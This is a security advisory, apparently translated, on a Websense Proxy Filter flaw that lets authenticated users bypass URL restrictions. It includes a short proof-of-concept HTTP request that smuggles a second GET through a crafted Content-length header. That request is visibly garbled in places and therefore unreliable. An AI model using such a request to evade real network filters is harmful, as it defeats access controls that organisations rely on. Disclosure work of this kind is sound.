Websense proxy filter Security Bypass Vulnerability

Release date:
Updated on:

Affected Systems:
Websense Proxy Filter
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56668

Websense Proxy Filter is an Internet access management system that monitors, reports, and manages the use of the internal internet.

Websense Proxy Filter has a security vulnerability. Users who pass identity authentication can successfully bypass URL restrictions and access unauthorized sites.

The remote Web server must accept maliciously crafted GET requests with a specified Content-length. Attackers can use Web proxy servers with the aforementioned features to completely bypass the filter. Only GET requests can be used for bypassing.

<* Source: Nahuel Grisolia

Link: http://seclists.org/fulldisclosure/2012/Nov/171
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

====
Getwww.facebook.com http/1.1
Accept: text/Html, application/xHtml + xml ,*/*
Accept-Language: es-AR
Cache-Control: no-cache
Content-length: 1

GET: // OTHERURL/OTHEROTHER
A
====

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Websense
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.websense.com/global/en/